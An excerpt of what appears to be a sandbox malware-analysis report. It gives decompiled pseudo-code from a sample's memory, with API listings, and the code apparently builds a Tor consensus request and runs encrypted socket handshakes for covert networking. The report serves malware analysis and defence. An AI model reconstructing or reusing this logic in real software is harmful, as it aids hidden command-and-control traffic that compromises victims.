    				 *((intOrPtr*)(_t49 + 0x20)) = __eax;
    				_t52 = __eax;
    				if(__eax == 0) {
    					L7:
    					_t12 = 0;
    				} else {
    					_t33 = _t49 + 0x20;
    					_t13 = E003D4054(_t49 + 0x20, _t52);
    					_t53 = _t13;
    					if(_t13 == 0 || E003D3EE9(_t33, _t34, _t53) == 0) {
    						L6:
    						E003DFF10( *((intOrPtr*)(_t49 + 0x20)));
    						goto L7;
    					} else {
    						 *((intOrPtr*)(_t49 + 0x14)) = 0x10;
    						__imp__#5( *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x28)))), _t49 + 0x14, _t49 + 0xc);
    						_t45 =  *0x3e8538(0x200);
    						 *_t49 = 0x400000;
    						_t21 =  *0x3e8538();
    						_t42 = _t21;
    						__imp__#12( *((intOrPtr*)(_t49 + 0x14)));
    						sprintf(_t45, "GET /tor/status-vote/current/consensus-microdesc/14C131+27B6B5+49015F+585769+805509+D586D1+E8A9C4+ED03BB+EFCBE7.z HTTP/1.0\r\nHost: %s\r\n\r\n", _t21);
    						_t24 = E003D4BDF(_t33, _t45, _t42,  *((intOrPtr*)(_t47 + 8)));
    						_t49 = _t49 + 0x1c;
    						if(_t24 == 0 || E003D4DC1(_t42) == 0) {
    							 *0x3e8540(_t42);
    							 *0x3e8540(_t45);
    							goto L6;
    						} else {
    							 *0x3e8540(_t42);
    							 *0x3e8540(_t45);
    							E003DFF10( *((intOrPtr*)(_t49 + 0x24)));
    							_t12 = 1;
    							__eflags = 1;
    						}
    					}
    				}
    				return _t12;
    			}

    APIs
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D40B3
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4122
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4165
      • Part of subcall function 003D4054: memset.MSVCRT ref: 003D41AC
      • Part of subcall function 003D4054: htonl.WS2_32(00000000), ref: 003D41C5
      • Part of subcall function 003D4054: getpeername.WS2_32(?,?,?), ref: 003D41EA
      • Part of subcall function 003D4054: memset.MSVCRT ref: 003D4226
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4233
    • getpeername.WS2_32(?), ref: 003D5039
    • inet_ntoa.WS2_32(?), ref: 003D5060
    • sprintf.MSVCRT ref: 003D506D
      • Part of subcall function 003D4BDF: memset.MSVCRT ref: 003D4C2D
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C61
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C80
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C90
      • Part of subcall function 003D4BDF: memset.MSVCRT ref: 003D4CA5
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4D4B
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4D68
      • Part of subcall function 003D4BDF: sscanf.MSVCRT ref: 003D4D70
      • Part of subcall function 003D4DC1: strtok.MSVCRT ref: 003D4E04
      • Part of subcall function 003D4DC1: strtok.MSVCRT ref: 003D4E0B
      • Part of subcall function 003D4DC1: strstr.MSVCRT ref: 003D4E3F
      • Part of subcall function 003D4DC1: strstr.MSVCRT ref: 003D4E60
      • Part of subcall function 003D4DC1: strstr.MSVCRT ref: 003D4E76
      • Part of subcall function 003D4DC1: strstr.MSVCRT ref: 003D4E8C
      • Part of subcall function 003D4DC1: strstr.MSVCRT ref: 003D4EA2
      • Part of subcall function 003D4DC1: sscanf.MSVCRT ref: 003D4ED4
      • Part of subcall function 003D4DC1: sprintf.MSVCRT ref: 003D4EFB
      • Part of subcall function 003D4DC1: sscanf.MSVCRT ref: 003D4F43
      • Part of subcall function 003D4DC1: strtok.MSVCRT ref: 003D4F88
      • Part of subcall function 003DFF10: closesocket.WS2_32(?), ref: 003DFF12
      • Part of subcall function 003D3EE9: memset.MSVCRT ref: 003D3F19
      • Part of subcall function 003D3EE9: htons.WS2_32(00000000), ref: 003D3F31
      • Part of subcall function 003D3EE9: memset.MSVCRT ref: 003D3F7B
      • Part of subcall function 003D3EE9: htons.WS2_32(?), ref: 003D3FB2
    Strings
    • GET /tor/status-vote/current/consensus-microdesc/14C131+27B6B5+49015F+585769+805509+D586D1+E8A9C4+ED03BB+EFCBE7.z HTTP/1.0Host: %s, xrefs: 003D5067
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 16%
    			E003DEA68(char* _a4, intOrPtr* _a8, short* _a12) {
    				char _v8;
    				char _v24;
    				short _t11;
    
    				if(sscanf(_a4, "%15[^:]:%d",  &_v24,  &_v8) == 2) {
    					_t11 =  &_v24;
    					__imp__#11(_t11);
    					 *_a8 = _t11;
    					if(_t11 == 0xffffffff) {
    						goto L1;
    					} else {
    						__imp__#9(_v8);
    						 *_a12 = _t11;
    						return 1;
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 60%
    			E003C4BF0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				char _v40;
    				char _v56;
    				char _v256;
    				char _v780;
    				char _v1304;
    				char _v1828;
    				intOrPtr _t97;
    				void* _t98;
    				char _t99;
    				void* _t110;
    				char _t112;
    				void* _t116;
    				void* _t117;
    				intOrPtr _t118;
    				void* _t123;
    				intOrPtr _t125;
    				void* _t130;
    				void* _t137;
    				intOrPtr _t139;
    				void* _t141;
    				intOrPtr _t143;
    				void* _t157;
    				void* _t168;
    				void* _t170;
    				intOrPtr _t176;
    				intOrPtr _t179;
    				intOrPtr _t181;
    				intOrPtr _t184;
    				intOrPtr _t185;
    				intOrPtr _t186;
    				char* _t192;
    				signed int _t193;
    				signed int _t195;
    				char* _t202;
    				char _t208;
    				void* _t212;
    				void* _t214;
    				void* _t216;
    				void* _t217;
    				void* _t219;
    				void* _t226;
    				void* _t228;
    
    				_t219 = __eflags;
    				_t208 = 0;
    				_t214 = __ecx;
    				_v12 = 0;
    				_v8 = 0;
    				_v40 = 0;
    				_v20 = 0;
    				_v28 = 0;
    				_v16 = 0;
    				E003CE520( &_v56);
    				E003C9090(_t219,  &_v256, 0x71);
    				_t97 =  *0x3e8628; // 0x622508
    				_t217 = _t216 + 8;
    				_t98 =  *((intOrPtr*)( *((intOrPtr*)(_t97 + 0x10))))( &_v256, 0x105,  &_v1828, 0, __edi, __esi, __ebx);
    				_t220 = _t98;
    				if(_t98 == 0) {
    					L32:
    					_t99 = _v8;
    					L34:
    					if(_t99 != _t208) {
    						E003CBB40(_t99);
    						_t217 = _t217 + 4;
    					}
    					L37:
    					_t100 = _v12;
    					if(_v12 != _t208) {
    						E003CBB40(_t100);
    						_t217 = _t217 + 4;
    					}
    					_t101 = _v16;
    					if(_v16 != _t208) {
    						E003CBB40(_t101);
    					}
    					E003C7AD0( &_v56);
    					return _v28;
    				}
    				E003C9090(_t220,  &_v256, 0x72);
    				_t13 = _t214 + 0x10; // 0xa06850ff
    				_push( *_t13);
    				_t110 = E003D0C10( &_v780, 0x105,  &_v256,  &_v1828);
    				_t217 = _t217 + 0x1c;
    				if(_t110 < 0) {
    					goto L32;
    				}
    				_v24 = 0;
    				if( *((intOrPtr*)(_t214 + 0x20)) <= 0) {
    					L30:
    					_t99 = _v8;
    					_v28 = 1;
    					goto L34;
    				} else {
    					_t157 = 0;
    					while(1) {
    						_t111 = _v12;
    						_v36 = _t208;
    						_v32 = _t208;
    						if(_v12 != _t208) {
    							E003CBB40(_t111);
    							_t217 = _t217 + 4;
    							_v12 = _t208;
    						}
    						_t112 = _v8;
    						_t224 = _t112 - _t208;
    						if(_t112 != _t208) {
    							E003CBB40(_t112);
    							_t217 = _t217 + 4;
    							_v8 = _t208;
    						}
    						E003C9090(_t224,  &_v256, 0x73);
    						_t26 = _t214 + 0x28; // 0x5d89ec5d
    						_push( *((intOrPtr*)( *_t26 + _t157 + 4)));
    						_t116 = E003D0C10( &_v1304, 0x105,  &_v256,  &_v780);
    						_t217 = _t217 + 0x1c;
    						if(_t116 < 0) {
    							goto L32;
    						}
    						_t192 =  &_v1304;
    						_t117 = E003CED90(_t192, _t208, _t208,  &_v36);
    						__imp___time64(_t208);
    						_t34 = _t214 + 0x28; // 0x5d89ec5d
    						_t118 =  *_t34;
    						_t217 = _t217 + 0x14;
    						_t168 = _t117 -  *((intOrPtr*)(_t118 + _t157 + 0x10));
    						asm("sbb edi, [eax+ebx+0x14]");
    						_t193 =  *(_t118 + _t157 + 8);
    						_t123 = (_t193 << 4) - _t193 + (_t193 << 4) - _t193 + (_t193 << 4) - _t193 + (_t193 << 4) - _t193;
    						asm("cdq");
    						_t226 = _t192 - _t193;
    						if(_t226 < 0 || _t226 <= 0 && _t168 <= _t123) {
    							L29:
    							_t125 = _v24 + 1;
    							_t157 = _t157 + 0x18;
    							_t208 = 0;
    							_v24 = _t125;
    							_t86 = _t214 + 0x20; // 0xd05d8953
    							if(_t125 <  *_t86) {
    								continue;
    							}
    							goto L30;
    						} else {
    							__imp___time64(0);
    							_t39 = _t214 + 0x28; // 0x5d89ec5d
    							_t195 =  *( *_t39 + _t157 + 8);
    							_t130 = (_t195 << 4) - _t195 + (_t195 << 4) - _t195 + (_t195 << 4) - _t195 + (_t195 << 4) - _t195;
    							_t217 = _t217 + 4;
    							_t170 = _t123 - _v36;
    							asm("cdq");
    							asm("sbb edi, [ebp-0x1c]");
    							_t228 = _t193 - _t195;
    							if(_t228 >= 0 && (_t228 > 0 || _t170 > _t130)) {
    								_t43 = _t214 + 0x44; // 0x89c933ff
    								if(E003D1840( *((intOrPtr*)( *_t43 + 8))) == 0) {
    									goto L29;
    								}
    								_t133 = _v16;
    								if(_v16 != 0) {
    									E003CBB40(_t133);
    									_t217 = _t217 + 4;
    								}
    								_t46 = _t214 + 0x44; // 0x89c933ff
    								_v16 = E003CDF10( *((intOrPtr*)( *_t46 + 8)));
    								_t212 = 0;
    								while(1) {
    									_t49 = _t214 + 0x28; // 0x5d89ec5d
    									_push( &_v20);
    									_push( &_v8);
    									_t54 = _t214 + 0x44; // 0x89c933ff
    									_push( *((intOrPtr*)( *_t49 + _t157 + 4)));
    									_push(5);
    									_push( *((intOrPtr*)( *_t54 + 8)));
    									_t137 = E003C5A10();
    									_t217 = _t217 + 0x14;
    									if(_t137 != 0) {
    										break;
    									}
    									Sleep(0x1388);
    									_t212 = _t212 + 1;
    									if(_t212 < 5) {
    										continue;
    									}
    									goto L29;
    								}
    								_t99 = _v8;
    								__eflags = _t99;
    								if(_t99 == 0) {
    									_t208 = 0;
    									__eflags = 0;
    									goto L37;
    								}
    								_t176 = _v20;
    								__eflags = _t176;
    								if(_t176 == 0) {
    									_t208 = 0;
    									__eflags = 0;
    									goto L34;
    								}
    								_t60 = _t214 + 0x44; // 0x89c933ff
    								_t139 = E003C9F70( &_v56,  *((intOrPtr*)( *((intOrPtr*)( *_t60 + 8)))), _t99, _t176,  &_v12,  &_v40);
    								__eflags = _t139;
    								if(_t139 == 0) {
    									_t208 = 0;
    									__eflags = 0;
    									goto L32;
    								}
    								_t179 =  *0x3e8628; // 0x622508
    								_t141 =  *((intOrPtr*)( *((intOrPtr*)(_t179 + 0xc0))))( &_v780);
    								__eflags = _t141 - 0xffffffff;
    								if(_t141 == 0xffffffff) {
    									_t184 =  *0x3e8628; // 0x622508
    									 *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x1e4))))( &_v780);
    									_t185 =  *0x3e8628; // 0x622508
    									 *((intOrPtr*)( *((intOrPtr*)(_t185 + 0x54))))( &_v780, 0);
    									_t186 =  *0x3e8628; // 0x622508
    									 *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x1d8))))( &_v780);
    								}
    								_t202 =  &_v1304;
    								_t143 = E003C1A80(_v8, _t202, _v8, _v20);
    								__imp___time64(0);
    								_t74 = _t214 + 0x28; // 0x5d89ec5d
    								_t181 =  *_t74;
    								_t217 = _t217 + 0x10;
    								__eflags = _a4;
    								 *((intOrPtr*)(_t181 + _t157 + 0x10)) = _t143;
    								 *((intOrPtr*)(_t181 + _t157 + 0x14)) = _t202;
    								if(__eflags == 0) {
    									_t80 = _t214 + 0x28; // 0x5d89ec5d
    									E003C2E90(_t214,  *((intOrPtr*)( *_t80 + _t157 + 4)),  *((intOrPtr*)( *_t80 + _t157)));
    								}
    							}
    							goto L29;
    						}
    					}
    					goto L32;
    				}
    			}

    APIs
    • _time64.MSVCRT ref: 003C4D1F
    • _time64.MSVCRT ref: 003C4D5B
      • Part of subcall function 003C5A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,003CFE81), ref: 003C5ABF
    • Sleep.KERNEL32(00001388), ref: 003C4DF0
    • _time64.MSVCRT ref: 003C4EA8
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003D0C10: _vsnwprintf.MSVCRT ref: 003D0C42
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 70%
    			E003C3070(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				char _v12;
    				char _v20;
    				char _v24;
    				char _v224;
    				char _t52;
    				char _t53;
    				void* _t56;
    				char _t57;
    				char _t58;
    				void* _t60;
    				intOrPtr _t63;
    				void* _t64;
    				intOrPtr _t75;
    				void* _t80;
    				intOrPtr _t82;
    				intOrPtr _t97;
    				intOrPtr _t104;
    				intOrPtr _t109;
    				char _t111;
    				void* _t114;
    				void* _t116;
    
    				_t81 = __ebx;
    				_t111 = 0;
    				_t114 = __ecx;
    				_v24 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				E003CBB30( &_v20);
    				E003CB1E0(__ebx,  &_v20);
    				if(E003CA140( &_v20, _a4) == 0) {
    					L20:
    					_t52 = _v12;
    					if(_t52 != 0) {
    						__imp__#6(_t52);
    					}
    					_t53 = _v8;
    					if(_t53 != 0) {
    						__imp__#6(_t53);
    					}
    					L003C26B0(_t81,  &_v20);
    					return _v24;
    				}
    				_push(__ebx);
    				_t56 = E003CDA00( &_v20);
    				_t9 = _t111 + 1; // 0x1
    				_t82 = _t9;
    				if(_t56 == 0) {
    					L18:
    					_v24 = _t82;
    					L19:
    					_pop(_t81);
    					goto L20;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					_t57 = _v12;
    					if(_t57 != 0) {
    						__imp__#6(_t57);
    					}
    					_t58 = _v8;
    					_v12 = 0;
    					if(_t58 != 0) {
    						__imp__#6(_t58);
    					}
    					_v8 = 0;
    					if(E003D0BE0( &_v20, _t111,  &_v12) == 0) {
    						goto L19;
    					} else {
    						_t60 = E003CF2E0( &_v20, _t111,  &_v8);
    						_t122 = _t60;
    						if(_t60 == 0) {
    							goto L19;
    						}
    						E003C9090(_t122,  &_v224, 0x81);
    						_t63 =  *0x3e8628; // 0x622508
    						_t116 = _t116 + 8;
    						_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + 0xe0))))(_v12,  &_v224);
    						_t123 = _t64;
    						if(_t64 == 0) {
    							E003C9090(_t123,  &_v224, 0x82);
    							_t104 =  *0x3e8628; // 0x622508
    							_t116 = _t116 + 8;
    							_push( &_v224);
    							_push(_v8);
    							if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0xe0))))() != 0) {
    								E003C9090(__eflags,  &_v224, 0x83);
    								_t97 =  *0x3e8628; // 0x622508
    								_t116 = _t116 + 8;
    								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t97 + 0xe0))))(_v8,  &_v224);
    								if(__eflags != 0) {
    									E003C9090(__eflags,  &_v224, 0x84);
    									_t75 =  *0x3e8628; // 0x622508
    									_t116 = _t116 + 8;
    									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t75 + 0xe0))))(_v8,  &_v224);
    									if(__eflags != 0) {
    										E003C9090(__eflags,  &_v224, 0xc4);
    										_t109 =  *0x3e8628; // 0x622508
    										_t116 = _t116 + 8;
    										_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0xe0))))(_v8,  &_v224);
    										__eflags = _t80;
    										if(_t80 == 0) {
    											 *((intOrPtr*)(_t114 + 0x3c)) = _t82;
    										}
    									} else {
    										 *((intOrPtr*)(_t114 + 0x38)) = _t82;
    									}
    								} else {
    									 *((intOrPtr*)(_t114 + 0x34)) = _t82;
    								}
    							} else {
    								 *((intOrPtr*)(_t114 + 0x30)) = _t82;
    							}
    						}
    					}
    					_t111 = _t111 + _t82;
    				} while (_t111 < E003CDA00( &_v20));
    				goto L18;
    			}

    APIs
      • Part of subcall function 003CB1E0: SysFreeString.OLEAUT32(?), ref: 003CB1F8
      • Part of subcall function 003CB1E0: SysFreeString.OLEAUT32(?), ref: 003CB201
    • SysFreeString.OLEAUT32(?), ref: 003C30C8
    • SysFreeString.OLEAUT32(?), ref: 003C30DD
      • Part of subcall function 003D0BE0: SysAllocString.OLEAUT32(?), ref: 003D0BF3
      • Part of subcall function 003CF2E0: SysAllocString.OLEAUT32(?), ref: 003CF2F4
    • SysFreeString.OLEAUT32(?), ref: 003C3240
    • SysFreeString.OLEAUT32(?), ref: 003C324E
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 30%
    			E003D3EE9(intOrPtr* __eax, void* __ecx, void* __eflags) {
    				void* _v8;
    				void* _v12;
    				char _v32;
    				void _v148;
    				void* __esi;
    				short _t38;
    				void* _t54;
    				void _t55;
    				intOrPtr* _t68;
    				void* _t70;
    				signed int _t71;
    				void* _t78;
    				void* _t86;
    
    				_t70 = __ecx;
    				_t68 = __eax;
    				_t78 =  *0x3e8538(0x200);
    				_v8 = _t78;
    				_v12 =  *0x3e8538(0x200);
    				memset(_t78, 0, 0x200);
    				 *_t78 = 0xd;
    				_t38 = E003DE937(_t70);
    				 *((short*)(_t68 + 0x138)) = _t38;
    				__imp__#9(_t38);
    				 *((short*)(_t78 + 3)) = _t38;
    				 *0x3e899c(_t68 + 8, _t78, 0x1fd);
    				_t71 = 0x1d;
    				memcpy( &_v148, _t68 + 8, _t71 << 2);
    				 *0x3e8ab0( &_v148,  &_v32);
    				_t86 = _v12;
    				 *((intOrPtr*)(_v8 + 5)) = _v32;
    				memset(_t86, 0, 0x200);
    				if(E003D3BB7(_t68 + 0xf0, _v8, 0x1fd, _t86 + 3, _t68 + 0x110, _t68 + 0x120) == 0) {
    					L7:
    					 *0x3e8540(_v8);
    					 *0x3e8540(_t86);
    					_t54 = 0;
    				} else {
    					_t55 =  *(_t68 + 4) & 0x0000ffff;
    					__imp__#9(_t55);
    					 *_t86 = _t55;
    					 *((char*)(_t86 + 2)) = 3;
    					if(E003DFD0B( *_t68, _t86, 0x200) != 0x200) {
    						goto L7;
    					} else {
    						if(E003DFB73( *_t68, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 3 || E003D3BB7(_t68 + 0x100, _v8 + 3, 0x1fd, _v12, _t68 + 0x124, _t68 + 0x134) == 0 ||  *_v12 != 4) {
    							_t86 = _v12;
    							goto L7;
    						} else {
    							 *0x3e8540(_v8);
    							 *0x3e8540(_v12);
    							_t54 = 1;
    						}
    					}
    				}
    				return _t54;
    			}

    APIs
    • memset.MSVCRT ref: 003D3F19
    • htons.WS2_32(00000000), ref: 003D3F31
    • memset.MSVCRT ref: 003D3F7B
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • htons.WS2_32(?), ref: 003D3FB2
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 75%
    			E003E0A40(intOrPtr* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
    				char _v8;
    				char _v12;
    				char _v212;
    				void* __ebx;
    				void* _t34;
    				void* _t40;
    				intOrPtr _t47;
    				signed int _t51;
    				intOrPtr _t52;
    				intOrPtr* _t53;
    				intOrPtr _t59;
    				intOrPtr _t61;
    				intOrPtr _t68;
    				intOrPtr* _t69;
    				intOrPtr* _t71;
    				void* _t73;
    				intOrPtr _t74;
    				signed int _t76;
    				void* _t77;
    				void* _t78;
    
    				_t73 = __esi;
    				_t71 = __edi;
    				_t51 = 0;
    				_v8 = 0;
    				_v12 = 0;
    				E003C9090(__eflags,  &_v212, 0xcf);
    				_t34 = E003C3C70( &_v12,  &_v212,  &_v8,  &_v12);
    				_t78 = _t77 + 0x14;
    				_t81 = _t34;
    				if(_t34 != 0) {
    					L2:
    					if(_v8 == _t51) {
    						L19:
    						return _t51;
    					}
    					if(_v12 <= 4) {
    						L17:
    						_t36 = _v8;
    						if(_v8 != 0) {
    							E003CBB40(_t36);
    						}
    						goto L19;
    					}
    					_push(0x34);
    					L003CA47E();
    					_t78 = _t78 + 4;
    					if(_t34 == _t51) {
    						goto L17;
    					}
    					_push(_t73);
    					_t74 = E003C70B0(_t34);
    					if(_t74 == _t51) {
    						L16:
    						goto L17;
    					}
    					_push(_t71);
    					_t40 = E003E09A0(_a4, _t74,  &_v212, _v8, _v12);
    					_t78 = _t78 + 0x14;
    					if(_t40 == 0) {
    						L14:
    						E003CCB70(_t51, _t74, _t71);
    						_push(_t74);
    						L003C1CB0();
    						_t78 = _t78 + 4;
    						L15:
    						goto L16;
    					}
    					_t71 = _a8;
    					if( *((intOrPtr*)(_t74 + 0x10)) <=  *((intOrPtr*)( *_t71 + 0x10))) {
    						goto L14;
    					}
    					_t68 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t68 + 0xac))))(0x3e8594);
    					_t52 =  *_t71;
    					if(_t52 != 0) {
    						E003CCB70(_t52, _t52, _t71);
    						_push(_t52);
    						L003C1CB0();
    						_t78 = _t78 + 4;
    					}
    					 *_t71 = _t74;
    					_t59 =  *0x3e8628; // 0x622508
    					_t69 =  *((intOrPtr*)(_t59 + 0xc4));
    					 *_t69(0x3e8594);
    					_t76 = 0;
    					if( *((intOrPtr*)( *_t71 + 0x18)) <= 0) {
    						L13:
    						_t51 = 1;
    						goto L15;
    					} else {
    						_t53 = __imp___time64;
    						do {
    							_t47 =  *_t53(0);
    							_t61 =  *((intOrPtr*)( *_t71 + 0x28));
    							 *((intOrPtr*)(_t61 + _t76 * 8)) = _t47;
    							 *((intOrPtr*)(_t61 + 4 + _t76 * 8)) = _t69;
    							_t69 =  *_t71;
    							_t76 = _t76 + 1;
    							_t78 = _t78 + 4;
    						} while (_t76 <  *((intOrPtr*)(_t69 + 0x18)));
    						goto L13;
    					}
    				}
    				E003C9090(_t81,  &_v212, 0x10);
    				_t34 = E003C3C70( &_v212,  &_v212,  &_v8,  &_v12);
    				_t78 = _t78 + 0x14;
    				if(_t34 == 0) {
    					goto L17;
    				}
    				goto L2;
    			}

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003E0AC0
    • ??3@YAXPAX@Z.MSVCRT ref: 003E0B35
    • _time64.MSVCRT ref: 003E0B63
      • Part of subcall function 003CCB70: SysFreeString.OLEAUT32(?), ref: 003CCB81
    • ??3@YAXPAX@Z.MSVCRT ref: 003E0B8B
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 78%
    			E003C1FE0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    				char _v8;
    				char _v12;
    				signed int _v16;
    				char _v20;
    				void* _t34;
    				intOrPtr _t41;
    				intOrPtr _t47;
    				intOrPtr _t49;
    				intOrPtr _t50;
    				intOrPtr _t53;
    				intOrPtr* _t55;
    				intOrPtr _t61;
    				intOrPtr _t65;
    				intOrPtr* _t70;
    				intOrPtr* _t72;
    				signed int _t75;
    				signed int _t77;
    				void* _t78;
    				void* _t79;
    
    				_t72 = _a12;
    				_t53 =  *_t72;
    				_t75 = 0;
    				_v8 = 0;
    				_v12 = 0;
    				_v20 = 0;
    				_v16 = 0;
    				_t34 = E003C5A10(_a8, 0x17,  *((intOrPtr*)(_t53 + 0x10)),  &_v8,  &_v12,  &_v20, __edi, __esi);
    				_t79 = _t78 + 0x18;
    				if(_t34 == 0) {
    					L13:
    					_t35 = _v8;
    					if(_v8 != 0) {
    						E003CBB40(_t35);
    					}
    					return _v16;
    				}
    				_push(0x34);
    				L003CA47E();
    				_t79 = _t79 + 4;
    				if(_t34 != 0) {
    					_t75 = E003C70B0(_t34);
    				}
    				if(E003C9020(_t75, _a4, _v8, _v12) == 0) {
    					L11:
    					__eflags = _t75;
    					if(_t75 != 0) {
    						E003CCB70(_t53, _t75, _t72);
    						_push(_t75);
    						L003C1CB0();
    						_t79 = _t79 + 4;
    					}
    				} else {
    					_t41 =  *((intOrPtr*)(_t75 + 0x10));
    					if(_t41 != _v20) {
    						goto L11;
    					}
    					_t86 = _t41 -  *((intOrPtr*)(_t53 + 0x10));
    					if(_t41 <=  *((intOrPtr*)(_t53 + 0x10))) {
    						goto L11;
    					}
    					E003E0900(_t53, _v8, _v12);
